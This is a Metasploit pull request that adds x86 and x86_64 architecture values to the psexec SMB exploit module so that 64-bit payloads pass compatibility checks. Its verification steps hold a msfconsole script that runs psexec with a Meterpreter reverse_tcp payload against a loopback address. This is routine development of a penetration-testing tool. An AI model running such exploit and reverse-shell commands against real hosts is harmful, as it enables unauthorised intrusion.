### PR TITLE
specify the 'Arch' values that psexec supports

### DIFF
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'StackAdjustment' => -3500
         },
       'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
       'Targets'        =>
         [
           [ 'Automatic', { } ],


### PR DESCRIPTION
#5427 fixed our payload compatibility checks, but psexec does not specify an 'Arch' value, so 64-bit payloads fail to execute due to it being marked as incompatible.
# Verification steps
- [x] Run the following script with and without this patch. It should continue without alerting about an incompatible payload with this patch.

```
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhost 127.0.0.2
set lhost 127.0.0.2
run
```
- [x] Verify that psexec actually works against a 64-bit windows target.
